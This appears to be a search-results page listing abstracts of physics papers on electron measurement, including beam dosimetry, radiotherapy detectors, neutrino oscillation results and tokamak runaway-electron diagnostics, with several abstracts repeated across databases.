factor: 1.345, year: 2016 19. Real-time measurement and monitoring of absorbed dose for electron beams Science.gov (United States) Korenev, Sergey; Korenev, Ivan; Rumega, Stanislav; Grossman, Leon 2004-09-01 The real-time method and system for measurement and monitoring of absorbed dose for industrial and research electron accelerators is considered in the report. The system was created on the basis of beam parameters method. The main concept of this method consists in the measurement of dissipated kinetic energy of electrons in the irradiated product, determination of number of electrons and mass of irradiated product in the same cell by following calculation of absorbed dose in the cell. The manual and automation systems for dose measurements are described. The systems are acceptable for all types of electron accelerators. 20. Real-time measurement and monitoring of absorbed dose for electron beams Energy Technology Data Exchange (ETDEWEB) Korenev, Sergey E-mail: [email protected]; Korenev, Ivan; Rumega, Stanislav; Grossman, Leon 2004-10-01 The real-time method and system for measurement and monitoring of absorbed dose for industrial and research electron accelerators is considered in the report. The system was created on the basis of beam parameters method. The main concept of this method consists in the measurement of dissipated kinetic energy of electrons in the irradiated product, determination of number of electrons and mass of irradiated product in the same cell by following calculation of absorbed dose in the cell. The manual and automation systems for dose measurements are described. The systems are acceptable for all types of electron accelerators. 1. Real-time measurement and monitoring of absorbed dose for electron beams International Nuclear Information System (INIS) Korenev, Sergey; Korenev, Ivan; Rumega, Stanislav; Grossman, Leon 2004-01-01 The real-time method and system for measurement and monitoring of absorbed dose for industrial and research electron accelerators is considered in the report. The system was created on the basis of beam parameters method. The main concept of this method consists in the measurement of dissipated kinetic energy of electrons in the irradiated product, determination of number of electrons and mass of irradiated product in the same cell by following calculation of absorbed dose in the cell. The manual and automation systems for dose measurements are described. The systems are acceptable for all types of electron accelerators 2. Problems in the measurement of electron-dose distribution with film dosimeters inserted into solid materials International Nuclear Information System (INIS) Okuda, Shuichi; Fukuda, Kyue; Tabata, Tatsuo; Okabe, Shigeru 1981-01-01 On the insertion of film dosimeters into solid materials, thin air gaps are formed. The influence of such gaps on measured profiles of depth-dose distributions was investigated for aluminum irradiated with collimated beams of 15-MeV electrons. Measurements were made by changing the gap width or the incidence angle of the electrons. The present results showed that streaming of incident electrons through the gaps resulted in the appearance of a peak and a minimum in a depth-dose curve measured. This effect was suppressed by the increase of the angle between the film and the electron-beam axis. (author) 3. Characterisation of a MOSFET-based detector for dose measurement under megavoltage electron beam radiotherapy Science.gov (United States) Jong, W. L.; Ung, N. M.; Tiong, A. H. L.; Rosenfeld, A. B.; Wong, J. H. D. 2018-03-01 The aim of this study is to investigate the fundamental dosimetric characteristics of the MOSkin detector for megavoltage electron beam dosimetry. The reproducibility, linearity, energy dependence, dose rate dependence, depth dose measurement, output factor measurement, and surface dose measurement under megavoltage electron beam were tested. The MOSkin detector showed excellent reproducibility (>98%) and linearity (R2= 1.00) up to 2000 cGy for 4-20 MeV electron beams. The MOSkin detector also showed minimal dose rate dependence (within ±3%) and energy dependence (within ±2%) over the clinical range of electron beams, except for an energy dependence at 4 MeV electron beam. An energy dependence correction factor of 1.075 is needed when the MOSkin detector is used for 4 MeV electron beam. The output factors measured by the MOSkin detector were within ±2% compared to those measured with the EBT3 film and CC13 chamber. The measured depth doses using the MOSkin detector agreed with those measured using the CC13 chamber, except at the build-up region due to the dose volume averaging effect of the CC13 chamber. For surface dose measurements, MOSkin measurements were in agreement within ±3% to those measured using EBT3 film. Measurements using the MOSkin detector were also compared to electron dose calculation algorithms namely the GGPB and eMC algorithms. Both algorithms were in agreement with measurements to within ±2% and ±4% for output factor (except for the 4 × 4 cm2 field size) and surface dose, respectively. With the uncertainties taken into account, the MOSkin detector was found to be a suitable detector for dose measurement under megavoltage electron beam. This has been demonstrated in the in vivo skin dose measurement on patients during electron boost to the breast tumour bed. 4. Electron momentum density measurements by means of positron annihilation and Compton spectroscopy International Nuclear Information System (INIS) Gerber, W.; Dlubek, G.; Marx, U.; Bruemmer, O.; Prautzsch, J. 1982-01-01 The electron momentum density is measured applying positron annihilation and Compton spectroscopy in order to get information about electron wave functions. Compton spectroscopic measurements of Pd-Ag and Cu-Zn alloy systems are carried out taking into account crystal structure, mixability, and order state. Three-dimensional momentum densities of silicon are determined in order to get better information about its electronic structure. The momentum density and the spin density of ferromagnetic nickel are investigated using angular correlation curves 5. The beam energy measurement system for the Beijing electron-positron collider International Nuclear Information System (INIS) Zhang, J.Y.; Abakumova, E.V.; Achasov, M.N.; Blinov, V.E.; Cai, X.; Dong, H.Y.; Fu, C.D.; Harris, F.A.; Kaminsky, V.V.; Krasnov, A.A.; Liu, Q.; Mo, X.H.; Muchnoi, N.Yu.; Nikolaev, I.B.; Qin, Q.; Qu, H.M.; Olsen, S.L.; Pyata, E.E.; Shamov, A.G.; Shen, C.P. 2012-01-01 The beam energy measurement system (BEMS) for the upgraded Beijing electron-positron collider BEPC-II is described. The system is based on measuring the energies of Compton back-scattered photons. The relative systematic uncertainty of the electron and positron beam energy determination is estimated as 2⋅10 -5 . 6. OTR profile measurement of a LINAC electron beam with portable ultra high-speed camera International Nuclear Information System (INIS) Mogi, T.; Nisiyama, S.; Tomioka, S.; Enoto, T. 2004-01-01 We have studied on and developed a portable ultra high-speed camera, and so applied to measurement of a LINAC electron beam. We measured spatial OTR profiles of a LINAC electron beam using this camera with temporal resolution 80ns. (author) 7. Measurements of electron excitation and recombination for Ne-like Ba46+ International Nuclear Information System (INIS) Marrs, R.E.; Levine, M.A.; Knapp, D.A.; Henderson, J.R. 1987-07-01 A new facility at Lawrence Livermore National Laboratory has been used to obtain measurements for electron-impact excitation, dielectronic recombination and radiative recombination for the neon-like Ba 46+ ion. The experimental technique consists of trapping highly charged ions inside the space charge of an electron beam and measuring their x-ray emission spectra 8. The beam energy measurement system for the Beijing electron-positron collider International Nuclear Information System (INIS) Abakumova, E.V.; Achasov, M.N.; Blinov, V.E.; Cai, X.; Dong, H.Y.; Fu, C.D.; Harris, F.A.; Kaminsky, V.V.; Krasnov, A.A.; Liu, Q.; Mo, X.H.; Muchnoi, N.Yu.; Nikolaev, I.B.; Qin, Q.; Qu, H.M.; Olsen, S.L.; Pyata, E.E.; Shamov, A.G.; Shen, C.P.; Todyshev, K.Yu. 2011-01-01 The beam energy measurement system (BEMS) for the upgraded Beijing electron-positron collider BEPC-II is described. The system is based on measuring the energies of Compton back-scattered photons. The relative systematic uncertainty of the electron and positron beam energy determination is estimated as 2×10 -5 . The relative uncertainty of the beam's energy spread is about 6%. 9. Measurement of the intensity ratio of Auger and conversion electrons for the electron capture decay of 125I. Science.gov (United States) Alotiby, M; Greguric, I; Kibédi, T; Lee, B Q; Roberts, M; Stuchbery, A E; Tee, Pi; Tornyi, T; Vos, M 2018-03-21 Auger electrons emitted after nuclear decay have potential application in targeted cancer therapy. For this purpose it is important to know the Auger electron yield per nuclear decay. In this work we describe a measurement of the ratio of the number of conversion electrons (emitted as part of the nuclear decay process) to the number of Auger electrons (emitted as part of the atomic relaxation process after the nuclear decay) for the case of 125 I. Results are compared with Monte-Carlo type simulations of the relaxation cascade using the BrIccEmis code. Our results indicate that for 125 I the calculations based on rates from the Evaluated Atomic Data Library underestimate the K Auger yields by 20%. 10. Measurement of the intensity ratio of Auger and conversion electrons for the electron capture decay of 125I Science.gov (United States) Alotiby, M.; Greguric, I.; Kibédi, T.; Lee, B. Q.; Roberts, M.; Stuchbery, A. E.; Tee, Pi; Tornyi, T.; Vos, M. 2018-03-01 Auger electrons emitted after nuclear decay have potential application in targeted cancer therapy. For this purpose it is important to know the Auger electron yield per nuclear decay. In this work we describe a measurement of the ratio of the number of conversion electrons (emitted as part of the nuclear decay process) to the number of Auger electrons (emitted as part of the atomic relaxation process after the nuclear decay) for the case of 125I. Results are compared with Monte-Carlo type simulations of the relaxation cascade using the BrIccEmis code. Our results indicate that for 125I the calculations based on rates from the Evaluated Atomic Data Library underestimate the K Auger yields by 20%. 11. Inter-satellite calibration of FengYun 3 medium energy electron fluxes with POES electron measurements Science.gov (United States) Zhang, Yang; Ni, Binbin; Xiang, Zheng; Zhang, Xianguo; Zhang, Xiaoxin; Gu, Xudong; Fu, Song; Cao, Xing; Zou, Zhengyang 2018-05-01 We perform an L-shell dependent inter-satellite calibration of FengYun 3 medium energy electron measurements with POES measurements based on rough orbital conjunctions within 5 min × 0.1 L × 0.5 MLT. By comparing electron flux data between the U.S. Polar Orbiting Environmental Satellites (POES) and Chinese sun-synchronous satellites including FY-3B and FY-3C for a whole year of 2014, we attempt to remove less reliable data and evaluate systematic uncertainties associated with the FY-3B and FY-3C datasets, expecting to quantify the inter-satellite calibration factors for the 150-350 keV energy channel at L = 2-7. Compared to the POES data, the FY-3B and FY-3C data generally exhibit a similar trend of electron flux variations but more or less underestimate them within a factor of 5 for the medium electron energy 150-350 keV channel. Good consistency in the flux conjunctions after the inter-calibration procedures gives us certain confidence to generalize our method to calibrate electron flux measurements from various satellite instruments. 12. Device intended for measurement of induced trapped charge in insulating materials under electron irradiation in a scanning electron microscope International Nuclear Information System (INIS) Belkorissat, R; Benramdane, N; Jbara, O; Rondot, S; Hadjadj, A; Belhaj, M 2013-01-01 A device for simultaneously measuring two currents (i.e. leakage and displacement currents) induced in insulating materials under electron irradiation has been built. The device, suitably mounted on the sample holder of a scanning electron microscope (SEM), allows a wider investigation of charging and discharging phenomena that take place in any type of insulator during its electron irradiation and to determine accurately the corresponding time constants. The measurement of displacement current is based on the principle of the image charge due to the electrostatic influence phenomena. We are reporting the basic concept and test results of the device that we have built using, among others, the finite element method for its calibration. This last method takes into account the specimen chamber geometry, the geometry of the device and the physical properties of the sample. In order to show the possibilities of the designed device, various applications under different experimental conditions are explored. (paper) 13. Thermal strain measurements in graphite using electronic speckle pattern interferometry International Nuclear Information System (INIS) Tamulevicius, S.; Augulis, L.; Augulis, R.; Zabarskas, V.; Levinskas, R.; Poskas, P. 2001-01-01 Two 1500 MW(e) RBMK Units are operated at Ignalina NPP in Lithuania. Due to recent decision of the Parliament on the earlier closure of Unit 1, preparatory work for decommissioning have been initiated. Preferred decommissioning strategy is based on delayed dismantling after rather long safe enclosure period. Since graphite is one of the basic and probably the most voluminous components of the reactor internals, a sufficient information on status and behaviour of graphite moderator and reflector during long time safe enclosure period is of special significance. In this context, thermal strain in graphite is one of the parameters requiring particular interest. Electronic speckle pattern interferometry has been proposed and successfully tested to control this parameter using the real samples of graphite from Ignalina NPP Units. (author) 14. Improved Measurement of Electron-antineutrino Disappearance at Daya Bay International Nuclear Information System (INIS) Dwyer, D.A. 2013-01-01 With 2.5× the previously reported exposure, the Daya Bay experiment has improved the measurement of the neutrino mixing parameter sin 2 2θ 13 =0.089±0.010(stat)±0.005(syst). Reactor anti-neutrinos were produced by six 2.9 GW th commercial power reactors, and measured by six 20-ton target-mass detectors of identical design. A total of 234,217 anti-neutrino candidates were detected in 127 days of exposure. An anti-neutrino rate of 0.944±0.007(stat)±0.003(syst) was measured by three detectors at a flux-weighted average distance of1648 m from the reactors, relative to two detectors at 470 m and one detector at 576 m. Detector design and depth underground limited the background to 5±0.3% (far detectors) and 2±0.2% (near detectors) of the candidate signals. The improved precision confirms the initial measurement of reactor anti-neutrino disappearance, and continues to be the most precise measurement of θ 13 15. Improved Measurement of Electron-antineutrino Disappearance at Daya Bay Energy Technology Data Exchange (ETDEWEB) Dwyer, D.A. [Kellogg Radiation Laboratory, California Institute of Technology, Pasadena, CA (United States); Lawrence Berkeley National Laboratory, Berkeley, CA (United States) 2013-02-15 With 2.5× the previously reported exposure, the Daya Bay experiment has improved the measurement of the neutrino mixing parameter sin{sup 2}2θ{sub 13}=0.089±0.010(stat)±0.005(syst). Reactor anti-neutrinos were produced by six 2.9 GW{sub th} commercial power reactors, and measured by six 20-ton target-mass detectors of identical design. A total of 234,217 anti-neutrino candidates were detected in 127 days of exposure. An anti-neutrino rate of 0.944±0.007(stat)±0.003(syst) was measured by three detectors at a flux-weighted average distance of1648 m from the reactors, relative to two detectors at 470 m and one detector at 576 m. Detector design and depth underground limited the background to 5±0.3% (far detectors) and 2±0.2% (near detectors) of the candidate signals. The improved precision confirms the initial measurement of reactor anti-neutrino disappearance, and continues to be the most precise measurement of θ{sub 13}. 16. Measurement of electron neutrino appearance with the MINOS experiment International Nuclear Information System (INIS) Boehm, Joshua Adam Alpern 2009-01-01 MINOS is a long-baseline two-detector neutrino oscillation experiment that uses a high intensity muon neutrino beam to investigate the phenomena of neutrino oscillations. By measuring the neutrino interactions in a detector near the neutrino source and again 735 km away from the production site, it is possible to probe the parameters governing neutrino oscillation. The majority of the ν μ oscillate to ν τ but a small fraction may oscillate instead to ν e . This thesis presents a measurement of the ν e appearance rate in the MINOS far detector using the first two years of exposure. Methods for constraining the far detector backgrounds using the near detector measurements is discussed and a technique for estimating the uncertainty on the background and signal selection are developed. A 1.6σ excess over the expected background rate is found providing a hint of ν e appearance. 17. Electronic system for the complex measurement of a Wilberforce pendulum Science.gov (United States) Kos, B.; Grodzicki, M.; Wasielewski, R. 2018-05-01 The authors present a novel application of a micro-electro-mechanical measurement system to the description of basic physical phenomena in a model Wilberforce pendulum. The composition of the kit includes a tripod with a mounted spring with freely hanging bob, a module GY-521 on the MPU 6050 coupled with an Arduino Uno, which in conjunction with a PC acts as measuring set. The system allows one to observe the swing of the pendulum in real time. Obtained data stays in good agreement with both theoretical predictions and previous works. The aim of this article is to introduce the study of a Wilberforce pendulum to the canon of physical laboratory exercises due to its interesting properties and multifaceted method of measurement. 18. Dosimetry with alanine/electron spin resonance. Measuring and evaluating International Nuclear Information System (INIS) Anton, M. 2007-02-01 In the first part of the present report a short outline of the theoretical foundations in view of the parameters and evaluation programs described in the following is given. The second part described the measurement procedures and the handling of the measuring data including the applied data formats. In the third part the collection SPAD of MATLAB programs is described, which are necessary for the processing of the measurment data and the subsequent evaluations. Routine evaluations can by means of the present graphic user surface simply be performed. But the described routines can (and shall) be used also as kit in order to solve special evaluation problems. The third part closes with a listing of all programs including the online available aid texts. All functions were tested both under MATLAB 6 and under MATLAB 7 19. Hard x-ray measurements of the hot-electron rings in EBT-S International Nuclear Information System (INIS) Hillis, D.L. 1982-06-01 A thorough understanding of the hot electron rings in ELMO Bumpy Torus-Scale (EBT-S) is essential to the bumpy torus concept of plasma production, since the rings provide bulk plasma stability. The hot electrons are produced via electron cyclotron resonant heating using a 28-GHz cw gyrotron, which has operated up to power levels of 200 kW. The parameters of the energetic electron rings are studied via hard x-ray measurement techniques and with diamagnetic pickup coils. The hard x-ray measurements have used collimated NaI(Tl) detectors to determine the electron temperature T/sub e/ and electron density n/sub e/ for the hot electron annulus. Typical values of T/sub e/ are 400 to 500 keV and of n/sub e/ 2 to 5 x 10 11 cm -3 . The total stored energy of a single energetic electron ring as measured by diamagnetic pickup loops approaches approx. 40 J and is in good agreement with that deduced from hard x-ray measurements. By combining the experimental measurements from hard x-rays and the diamagnetic loops, an estimate can be obtained for the volume of a single hot electron ring. The ring volume is determined to be approx. 2.2 litres, and this volume remains approximately constant over the T-mode operating regime. Finally, the power in the electrons scattered out of the ring is measured indirectly by measuring the x-ray radiation produced when those electrons strike the chamber walls. The variation of this radiation with increasing microwave power levels is found to be consistent with classical scattering estimates 20. First measurements of electron vorticity in the foreshock and solar wind International Nuclear Information System (INIS) Gurgiolo, C.; Goldstein, M.L.; Vinas, A.F.; Fazakerley, A.N. 2010-01-01 We describe the methodology used to set up and compute spatial derivatives of the electron moments using data acquired by the Plasma Electron And Current Experiment (PEACE) from the four Cluster spacecraft. The results are used to investigate electron vorticity in the foreshock. We find that much of the measured vorticity, under nominal conditions, appears to be caused by changes in the flow direction of the return (either reflected or leakage from the magnetosheath) and strahl electron populations as they couple to changes in the magnetic field orientation. This in turn results in deflections in the total bulk velocity producing the measured vorticity. (orig.) 1. First measurements of electron vorticity in the foreshock and solar wind Energy Technology Data Exchange (ETDEWEB) Gurgiolo, C. [Bitterroot Basic Research, Hamilton, MT (United States); Goldstein, M.L.; Vinas, A.F. [NASA Goddard Space Flight Center, Greenbelt, MD (United States). Geospace Science Lab.; Fazakerley, A.N. [University College London (United Kingdom). Mullard Space Science Lab. 2010-07-01 We describe the methodology used to set up and compute spatial derivatives of the electron moments using data acquired by the Plasma Electron And Current Experiment (PEACE) from the four Cluster spacecraft. The results are used to investigate electron vorticity in the foreshock. We find that much of the measured vorticity, under nominal conditions, appears to be caused by changes in the flow direction of the return (either reflected or leakage from the magnetosheath) and strahl electron populations as they couple to changes in the magnetic field orientation. This in turn results in deflections in the total bulk velocity producing the measured vorticity. (orig.) 2. First measurements of electron vorticity in the foreshock and solar wind Directory of Open Access Journals (Sweden) C. Gurgiolo 2010-12-01 Full Text Available We describe the methodology used to set up and compute spatial derivatives of the electron moments using data acquired by the Plasma Electron And Current Experiment (PEACE from the four Cluster spacecraft. The results are used to investigate electron vorticity in the foreshock. We find that much of the measured vorticity, under nominal conditions, appears to be caused by changes in the flow direction of the return (either reflected or leakage from the magnetosheath and strahl electron populations as they couple to changes in the magnetic field orientation. This in turn results in deflections in the total bulk velocity producing the measured vorticity. 3. Plasma potential measurements in the edge region of the ISTTOK plasma, using electron emissive probes International Nuclear Information System (INIS) Ionita, C.; Balan, P.; Schrittwieser, R.; Cabral, J.A.; Fernandes, H.; Figueiredo, H. F.C.; Varandas, C. 2001-01-01 We have recently started to use electron-emissive probes for direct measurements of the plasma potential and its fluctuations in the edge region of the plasma ring in the tokamak ISTTOK in Lisbon, Portugal. This method is based on the fact that the electron emission current of such a probe is able to compensate electron temperature variations and electron drifts, which can occur in the edge plasma region of magnetized fusion devices, and which are making measurements with cold probes prone to errors. In this contribution we present some of the first results of our investigations in ISTTOK.(author) 4. Weak measurement from the electron displacement current: new path for applications International Nuclear Information System (INIS) Marian, D; Colomés, E; Oriols, X; Zanghì, N 2015-01-01 The interest on weak measurements is rapidly growing during the last years as a unique tool to better understand and predict new quantum phenomena. Up to now many theoretical and experimental weak-measurement techniques deal with (relativistic) photons or cold atoms, but there is much less investigation on (non-relativistic) electrons in up-to-date electronics technologies. We propose a way to perform weak measurements in nanoelectronic devices through the measurement of the total current (particle plus displacement component) in such devices. We study the interaction between an electron in the active region of a electron device with a metal surface working as a sensing electrode by means of the (Bohmian) conditional wave function. We perform numerical (Monte Carlo) simulations to reconstruct the Bohmian trajectories in the iconic double slit experiment. This work opens new paths for understanding the quantum properties of an electronic system as well as for exploring new quantum engineering applications in solid state physics. (paper) 5. Cherenkov-type diamond detectors for measurements of fast electrons in the TORE-SUPRA tokamak International Nuclear Information System (INIS) Jakubowski, L.; Sadowski, M. J.; Zebrowski, J.; Rabinski, M.; Malinowski, K.; Mirowski, R.; Lotte, Ph.; Gunn, J.; Pascal, J-Y.; Colledani, G.; Basiuk, V.; Goniche, M.; Lipa, M. 2010-01-01 The paper presents a schematic design and tests of a system applicable for measurements of fast electron pulses emitted from high-temperature plasma generated inside magnetic confinement fusion machines, and particularly in the TORE-SUPRA facility. The diagnostic system based on the registration of the Cherenkov radiation induced by fast electrons within selected solid radiators is considered, and electron low-energy thresholds for different radiators are given. There are some estimates of high thermal loads, which might be deposited by intense electron beams upon parts of the diagnostic equipment within the TORE-SUPRA device. There are some proposed measures to overcome this difficulty by the selection of appropriate absorption filters and Cherenkov radiators, and particularly by the application of a fast-moving reciprocating probe. The paper describes the measuring system, its tests, as well as some results of the preliminary measurements of fast electrons within TORE-SUPRA facility. 6. Measurement of high-energy electrons by means of a Cherenkov detector in ISTTOK tokamak Energy Technology Data Exchange (ETDEWEB) Jakubowski, L., E-mail: [email protected] [Andrzej Soltan Institute for Nuclear Studies (IPJ), 05-400 Otwock-Swierk (Poland); Zebrowski, J. [Andrzej Soltan Institute for Nuclear Studies (IPJ), 05-400 Otwock-Swierk (Poland); Plyusnin, V.V. [Association Euratom/IST, Instituto de Plasmas e Fusao Nuclear, Instituto Superior Tecnico, Av. Rovisco Pais, 1049 - 001 Lisboa (Portugal); Malinowski, K.; Sadowski, M.J.; Rabinski, M. [Andrzej Soltan Institute for Nuclear Studies (IPJ), 05-400 Otwock-Swierk (Poland); Fernandes, H.; Silva, C.; Duarte, P. [Association Euratom/IST, Instituto de Plasmas e Fusao Nuclear, Instituto Superior Tecnico, Av. Rovisco Pais, 1049 - 001 Lisboa (Portugal) 2010-10-15 The paper concerns detectors of the Cherenkov radiation which can be used to measure high-energy electrons escaping from short-living plasma. Such detectors have high temporal (about 1 ns) and spatial (about 1 mm) resolution. The paper describes a Cherenkov-type detector which was designed, manufactured and installed in the ISTTOK tokamak in order to measure fast runaway electrons. The radiator of that detector was made of an aluminium nitride (AlN) tablet with a light-tight filter on its front surface. Cherenkov signals from the radiator were transmitted through an optical cable to a fast photomultiplier. It made possible to perform direct measurements of the runaway electrons of energy above 80 keV. The measured energy values and spatial characteristics of the recorded electrons appeared to be consistent with results of numerical modelling of the runaway electron generation process in the ISTTOK tokamak. 7. Cherenkov-type diamond detectors for measurements of fast electrons in the TORE-SUPRA tokamak Energy Technology Data Exchange (ETDEWEB) Jakubowski, L.; Sadowski, M. J.; Zebrowski, J.; Rabinski, M.; Malinowski, K.; Mirowski, R. [Andrzej Soltan Institute for Nuclear Studies (IPJ), Otwock-Swierk 05-400 (Poland); Lotte, Ph.; Gunn, J.; Pascal, J-Y.; Colledani, G.; Basiuk, V.; Goniche, M.; Lipa, M. [CEA, IRFM, St Paul-lez-Durance F-13108 (France) 2010-01-15 The paper presents a schematic design and tests of a system applicable for measurements of fast electron pulses emitted from high-temperature plasma generated inside magnetic confinement fusion machines, and particularly in the TORE-SUPRA facility. The diagnostic system based on the registration of the Cherenkov radiation induced by fast electrons within selected solid radiators is considered, and electron low-energy thresholds for different radiators are given. There are some estimates of high thermal loads, which might be deposited by intense electron beams upon parts of the diagnostic equipment within the TORE-SUPRA device. There are some proposed measures to overcome this difficulty by the selection of appropriate absorption filters and Cherenkov radiators, and particularly by the application of a fast-moving reciprocating probe. The paper describes the measuring system, its tests, as well as some results of the preliminary measurements of fast electrons within TORE-SUPRA facility. 8. Lattice constant measurement from electron backscatter diffraction patterns DEFF Research Database (Denmark) Saowadee, Nath; Agersted, Karsten; Bowen, Jacob R. 2017-01-01 Kikuchi bands in election backscattered diffraction patterns (EBSP) contain information about lattice constants of crystallographic samples that can be extracted via the Bragg equation. An advantage of lattice constant measurement from EBSPs over diffraction (XRD) is the ability to perform local ... 9. Clinical use of a portable electronic device to measure haematocrit ... African Journals Online (AJOL) Mean plasma total protein and albumin concentrations were lower compared with normal reference ranges. Six of the 24 patients were acidotic and 4 alkalotic. Leucocyte counts obtained randomly from 13 patients were elevated. Changes in measurements which could influence conductivity did not affect the BEM reading. 10. Contactless Opto-electronic Area and Their Attainable Measuring Accuracy Directory of Open Access Journals (Sweden) V. Ricny 2001-06-01 Full Text Available This paper deals with the problems of the contactless areameasurement on the principle of video signal processing. This videosignal generates TV camera, which scans the measured object. Basicprinciple of these meters is explained and attainable measurementaccuracy and factors influencing this accuracy are analyzed. 11. Depletion region surface effects in electron beam induced current measurements Energy Technology Data Exchange (ETDEWEB) Haney, Paul M.; Zhitenev, Nikolai B. [Center for Nanoscale Science and Technology, National Institute of Standards and Technology, Gaithersburg, Maryland 20899 (United States); Yoon, Heayoung P. [Department of Electrical and Computer Engineering, University of Utah, Salt Lake City, Utah 84112 (United States); Gaury, Benoit [Center for Nanoscale Science and Technology, National Institute of Standards and Technology, Gaithersburg, Maryland 20899 (United States); Maryland NanoCenter, University of Maryland, College Park, Maryland 20742 (United States) 2016-09-07 Electron beam induced current (EBIC) is a powerful characterization technique which offers the high spatial resolution needed to study polycrystalline solar cells. Current models of EBIC assume that excitations in the p-n junction depletion region result in perfect charge collection efficiency. However, we find that in CdTe and Si samples prepared by focused ion beam (FIB) milling, there is a reduced and nonuniform EBIC lineshape for excitations in the depletion region. Motivated by this, we present a model of the EBIC response for excitations in the depletion region which includes the effects of surface recombination from both charge-neutral and charged surfaces. For neutral surfaces, we present a simple analytical formula which describes the numerical data well, while the charged surface response depends qualitatively on the location of the surface Fermi level relative to the bulk Fermi level. We find that the experimental data on FIB-prepared Si solar cells are most consistent with a charged surface and discuss the implications for EBIC experiments on polycrystalline materials. 12. Analysis and modeling of electronic portal imaging exit dose measurements International Nuclear Information System (INIS) Pistorius, S.; Yeboah, C. 1995-01-01 In spite of the technical advances in treatment planning and delivery in recent years, it is still unclear whether the recommended accuracy in dose delivery is being achieved. Electronic portal imaging devices, now in routine use in many centres, have the potential for quantitative dosimetry. As part of a project which aims to develop an expert-system based On-line Dosimetric Verification (ODV) system we have investigated and modelled the dose deposited in the detector of a video based portal imaging system. Monte Carlo techniques were used to simulate gamma and x-ray beams in homogeneous slab phantom geometries. Exit doses and energy spectra were scored as a function of (i) slab thickness, (ii) field size and (iii) the air gap between the exit surface and the detector. The results confirm that in order to accurately calculate the dose in the high atomic number Gd 2 O 2 S detector for a range of air gaps, field sizes and slab thicknesses both the magnitude of the primary and scattered components and their effective energy need to be considered. An analytic, convolution based model which attempts to do this is proposed. The results of the simulation and the ability of the model to represent these data will be presented and discussed. This model is used to show that, after training, a back-propagation feed-forward cascade correlation neural network has the ability to identify and recognise the cause of, significant dosimetric errors 13. An apparatus for measuring the energy and angular distribution of electrons in ion-atom collisions International Nuclear Information System (INIS) Gibson, D.K.; Petersen, M.C.E. 1978-07-01 There is a need for further data on the energy and angular distribution of electrons ejected from atoms and molecules by ion impact. An apparatus in which simultaneous measurements can be made of the energy and angular distributions of such electrons is described. The advantages of the apparatus are the possibility of fast data collection and the ability to make measurements over the whole range of scattering angle. Preliminary tests and a trial measurement with the apparatus are described 14. Measurements of Plasma Expansion due to Background Gas in the Electron Diffusion Gauge Experiment International Nuclear Information System (INIS) Morrison, Kyle A.; Paul, Stephen F.; Davidson, Ronald C. 2003-01-01 The expansion of pure electron plasmas due to collisions with background neutral gas atoms in the Electron Diffusion Gauge (EDG) experiment device is observed. Measurements of plasma expansion with the new, phosphor-screen density diagnostic suggest that the expansion rates measured previously were observed during the plasma's relaxation to quasi-thermal-equilibrium, making it even more remarkable that they scale classically with pressure. Measurements of the on-axis, parallel plasma temperature evolution support the conclusion 15. Calibrating MMS Electron Drift Instrument (EDI) Ambient Electron Flux Measurements and Characterizing 3D Electric Field Signatures of Magnetic Reconnection Science.gov (United States) Shuster, J. R.; Torbert, R. B.; Vaith, H.; Argall, M. R.; Li, G.; Chen, L. J.; Ergun, R. E.; Lindqvist, P. A.; Marklund, G. T.; Khotyaintsev, Y. V.; Russell, C. T.; Magnes, W.; Le Contel, O.; Pollock, C. J.; Giles, B. L. 2015-12-01 The electron drift instruments (EDIs) onboard each MMS spacecraft are designed with large geometric factors (~0.01cm2 str) to facilitate detection of weak (~100 nA) electron beams fired and received by the two gun-detector units (GDUs) when EDI is in its "electric field mode" to determine the local electric and magnetic fields. A consequence of the large geometric factor is that "ambient mode" electron flux measurements (500 eV electrons having 0°, 90°, or 180° pitch angle) can vary depending on the orientation of the EDI instrument with respect to the magnetic field, a nonphysical effect that requires a correction. Here, we present determinations of the θ- and ø-dependent correction factors for the eight EDI GDUs, where θ (ø) is the polar (azimuthal) angle between the GDU symmetry axis and the local magnetic field direction, and compare the corrected fluxes with those measured by the fast plasma instrument (FPI). Using these corrected, high time resolution (~1,000 samples per second) ambient electron fluxes, combined with the unprecedentedly high resolution 3D electric field measurements taken by the spin-plane and axial double probes (SDP and ADP), we are equipped to accurately detect electron-scale current layers and electric field waves associated with the non-Maxwellian (anisotropic and agyrotropic) particle distribution functions predicted to exist in the reconnection diffusion region. We compare initial observations of the diffusion region with distributions and wave analysis from PIC simulations of asymmetric reconnection applicable for modeling reconnection at the Earth's magnetopause, where MMS will begin Science Phase 1 as of September 1, 2015. 16. Measurements of Neutral Kaon Decays to Two Electron Positron Pairs Energy Technology Data Exchange (ETDEWEB) Halkiadakis, Eva [Rutgers U., Piscataway 2001-01-01 We observed 441 $K_L \\to e^+ e^- e^+ e^-$ events with a background of 4.2 events in the KTeV/E799II experiment at Fermilab. We present here a measurement of the $K_L \\to e^+ e^- e^+ e^-$ branching ratio (B), a study of CP symmetry and the first detailed study of the $e^+ e^-$ invariant mass spectrum in this decay mode.... 17. Measurement of electron neutrino appearance with the MINOS experiment Energy Technology Data Exchange (ETDEWEB) Boehm, Joshua Adam Alpern [Harvard Univ., Cambridge, MA (United States) 2009-05-01 MINOS is a long-baseline two-detector neutrino oscillation experiment that uses a high intensity muon neutrino beam to investigate the phenomena of neutrino oscillations. By measuring the neutrino interactions in a detector near the neutrino source and again 735 km away from the production site, it is possible to probe the parameters governing neutrino oscillation. The majority of the vμ oscillate to vτ but a small fraction may oscillate instead to ve. This thesis presents a measurement of the ve appearance rate in the MINOS far detector using the first two years of exposure. Methods for constraining the far detector backgrounds using the near detector measurements is discussed and a technique for estimating the uncertainty on the background and signal selection are developed. A 1.6σ excess over the expected background rate is found providing a hint of ve appearance. 18. Spectral measurements of few-electron uranium ions produced and trapped in a high-energy electron beam ion trap International Nuclear Information System (INIS) Beiersdorfer, P. 1994-01-01 Measurements of 2s l/2 -2p 3/2 electric dipole and 2p 1/2 -2p 3/2 magnetic dipole and electric quadrupole transitions in U 82+ through U 89+ have been made with a high-resolution crystal spectrometer that recorded the line radiation from stationary ions produced and trapped in a high-energy electron beam ion trap. From the measurements we infer -39.21 ± 0.23 eV for the QED contribution to the 2s 1/2 -2p 3/2 transition energy of lithiumlike U 89+ . A comparison between our measurements and various computations illustrates the need for continued improvements in theoretical approaches for calculating the atomic structure of ions with two or more electrons in the L shell 19. Measurement of eDsub(L)/μ of electrons in liquid xenon International Nuclear Information System (INIS) Doke, T.; Suzuki, S.; Shibamura, E.; Masuda, K. 1983-01-01 A new method for measuring the spread of electron swarm drifting under uniform electric field in liquid xenon is proposed. This is made by observing the width of scintillation pulse produced by drifting electrons in the vicinity of a thin center wire of a proportional scintillation counter, put in the end part of the electron drift space. From the spread of electron swarm and its drift 